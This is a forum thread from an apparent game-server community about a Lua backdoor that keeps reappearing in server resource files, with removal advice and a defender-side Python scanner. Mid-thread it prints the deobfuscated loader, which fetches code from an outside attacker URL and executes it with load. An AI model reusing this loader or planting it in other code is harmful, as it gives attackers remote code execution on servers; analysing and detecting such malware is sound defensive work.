Virus in server files

Hey.

I searched for the new virus infection code and found a lot of it in my script.
I removed it, and after every server restart it’s coming back into the resources’ Lua files.

Does anyone know how to get rid of this?

My initial advice is: don’t trust a machine that has been infected, reinstall the whole machine. You don’t know how deep your OS got infected.

Then, to answer your topic, also try looking for the initial payload, e.g. search for code containing Enchanced_Tabs. You might still not be able to find it if it’s in obfuscated/“encrypted” code.

Hey.

If it’s encrypted, how can I find it then?

I deobfuscated it a few months ago, this is the code:

Anyway, it’s a very badly made malware; it injects into rconlog. The funniest thing is that the path is static, so if you simply move the rconlog resource the malware will never infect you again. I’ve also written a little guide on how to protect yourself from this trash.

I hope it’s “don’t install suspicious/‘leaked’/modified/‘improved’ resources from third-party websites”. The fact that this stuff exists and is somehow popular really does show that most people are dangerously careless with server hosting.

How do I remove that rcon shit?
My rcon in server.cfg is #rcon_password “”
And I don’t have any rcon resource …

You can read the “How to protect against this backdoor” section in my GitHub repository.

Yeah, I used the blocked-domain method, but they can just do it from another domain…
When searching in my resources I couldn’t find any rconlog resource… should I have it?

Probably the resource has changed, but the domain is still that one, they use that one, so it’s enough to block that one and you have removed the problem.

No? Why would you leave your server vulnerable with malicious code? The events it registers still exist; you should make sure to completely remove the malware code instead of just ignoring it.

@L1R ignore what he’s saying, you should go through all of your resources and check for the malware code.

Sorry, but if the code is all executed remotely from that URL, what malicious code should still be there? Anyway, just open my repository and read the section “How to protect against this backdoor”, or read the code and understand by yourself how it works.
Another thing: don’t raise the tone and start insulting. I am here to have fun and help, not to be insulted, thanks.

Ridiculous argument; malicious code could rewrite hosts, or fall back to a different URL/IP/whatever if it ever gets updated.

Maybe don’t spread nonsense advice? Saying “ignore it” is grossly negligent.

if it ever gets updated.

This is the part you should think about: the code (as you can see from the GitHub) is almost all executed remotely, so if you block the connections to that URL (for now) you’re done.

…until the victim updates the resource or downloads a different one with the infection.

After an analysis of my server, I found where that virus was located, blessed VS Code! Coincidentally it was in the RCORE_ARCADE script. After eliminating that code and “disinfecting” the machine with the HXAV that is on GitHub, I have verified that the virus disappeared forever. Even so, I have taken measures to prevent it from happening again. I advise you, and I attach a screenshot of the code that the virus put in the script.

I’m having an issue. There is malware in one of my resources. I spent 7 hours one day looking and 5 yesterday.

-- The same loader, split into statements with the hex strings decoded in comments.
-- Every name it needs is stored as a hex-escaped string so a plain-text search misses it.
local nKTOxfgYSWNozIkcZKKmBadXqqvpQGTbVDSyBUSCcZEdFLksNNBiSkTevShjblfADwPeCm = {
    "\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74", -- [1] "PerformHttpRequest"
    "\x61\x73\x73\x65\x72\x74", -- [2] "assert"
    "\x6c\x6f\x61\x64",         -- [3] "load"
    _G,                         -- [4] the global table, used to look the names up
    "",                         -- [5] empty string
    nil                         -- [6] nil
}
-- [4][[1]] is _G["PerformHttpRequest"]; the URL string decodes to
-- https://cipher-panel.me/_i/v2_/stage3.php?to=dxl76 (the remote stage the thread discusses blocking)
nKTOxfgYSWNozIkcZKKmBadXqqvpQGTbVDSyBUSCcZEdFLksNNBiSkTevShjblfADwPeCm[4][nKTOxfgYSWNozIkcZKKmBadXqqvpQGTbVDSyBUSCcZEdFLksNNBiSkTevShjblfADwPeCm[1]]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x69\x70\x68\x65\x72\x2d\x70\x61\x6e\x65\x6c\x2e\x6d\x65\x2f\x5f\x69\x2f\x76\x32\x5f\x2f\x73\x74\x61\x67\x65\x33\x2e\x70\x68\x70\x3f\x74\x6f\x3d\x64\x78\x6c\x37\x36", function (dtoZoIzlKVWHWkdRzMDXAvcCbuCiuBMqUVeRurfhItZZIlnLeDhQCCjlQlbZBXIirZpHqB, DkVkLEeNPFntsvJLKlRTVUjvzThOmPuUueWnhJimJrYFjEVcpBgiNQoCqEhhbhZZjaiKfU)
    -- second argument is the response body; stop if it is nil ([6]) or empty ([5])
    if (DkVkLEeNPFntsvJLKlRTVUjvzThOmPuUueWnhJimJrYFjEVcpBgiNQoCqEhhbhZZjaiKfU == nKTOxfgYSWNozIkcZKKmBadXqqvpQGTbVDSyBUSCcZEdFLksNNBiSkTevShjblfADwPeCm[6] or DkVkLEeNPFntsvJLKlRTVUjvzThOmPuUueWnhJimJrYFjEVcpBgiNQoCqEhhbhZZjaiKfU == nKTOxfgYSWNozIkcZKKmBadXqqvpQGTbVDSyBUSCcZEdFLksNNBiSkTevShjblfADwPeCm[5]) then return end
    -- _G["assert"](_G["load"](body))(): compile the downloaded text as Lua and run it
    nKTOxfgYSWNozIkcZKKmBadXqqvpQGTbVDSyBUSCcZEdFLksNNBiSkTevShjblfADwPeCm[4][nKTOxfgYSWNozIkcZKKmBadXqqvpQGTbVDSyBUSCcZEdFLksNNBiSkTevShjblfADwPeCm[2]](nKTOxfgYSWNozIkcZKKmBadXqqvpQGTbVDSyBUSCcZEdFLksNNBiSkTevShjblfADwPeCm[4][nKTOxfgYSWNozIkcZKKmBadXqqvpQGTbVDSyBUSCcZEdFLksNNBiSkTevShjblfADwPeCm[3]](DkVkLEeNPFntsvJLKlRTVUjvzThOmPuUueWnhJimJrYFjEVcpBgiNQoCqEhhbhZZjaiKfU))()
end)
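A defender-side scanner for resource Lua files, added here as an example; it is not part of the thread, of HXAV or of any other tool mentioned. It decodes the \xNN escapes the sample above hides its strings behind and flags lines that combine them with PerformHttpRequest/load or an embedded URL, which is what a manual VS Code search would miss. The sample input is constructed with a placeholder URL.

```python
import os
import re

# Indicators drawn from the sample above: runs of \xNN escapes hiding strings,
# PerformHttpRequest fetching a remote stage, and load/assert executing it.
HEX_RUN = re.compile(r'(?:\\x[0-9a-fA-F]{2}){4,}')
NAMES = re.compile(r'\b(PerformHttpRequest|load|assert|Enchanced_Tabs)\b')
URL = re.compile(r'https?://[^\s"\']+')

def decode_hex_escapes(text):
    """Turn "\\x6c\\x6f\\x61\\x64" back into "load" so names become searchable."""
    return HEX_RUN.sub(
        lambda m: bytes.fromhex(m.group(0).replace('\\x', '')).decode('latin-1'),
        text)

def scan_lua(source):
    """Return one finding per line that hides a loader behind hex escapes."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        if not HEX_RUN.search(line):
            continue  # plain code: the hidden-string indicator is absent
        decoded = decode_hex_escapes(line)
        names = NAMES.findall(decoded)
        urls = URL.findall(decoded)
        if {"PerformHttpRequest", "load"} & set(names) or urls:
            findings.append({"line": lineno, "names": names, "urls": urls})
    return findings

def scan_tree(root):
    """Walk a resources folder and scan every .lua file; returns {path: findings}."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".lua"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_lua(fh.read())
                if hits:
                    report[path] = hits
    return report

# Constructed sample in the shape of the loader above (placeholder URL, not a real one).
SAMPLE = r'''local t = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x6c\x6f\x61\x64",_G}
t[3][t[1]]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x65\x78\x61\x6d\x70\x6c\x65\x2e\x69\x6e\x76\x61\x6c\x69\x64\x2f\x73", function(c, b) t[3][t[2]](b)() end)
RegisterNetEvent("rconlog:ping")'''

if __name__ == "__main__":
    for finding in scan_lua(SAMPLE):
        print(finding)
```

Run `scan_tree("resources")` from the server folder to get a report keyed by file; a hit only tells you where to look, so read the decoded line before deleting anything.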

Hello, I have the virus too, but I can’t find it.
Can you send me the link to HXAV? Thank you.

I’m looking for help too, did you find a way?

Guys, use VS Code and search for suspicious code; it might do 50% of the disinfection. Also read your code before installing it, you will also learn how it works. Great community, love you guys.

Were you able to fix it?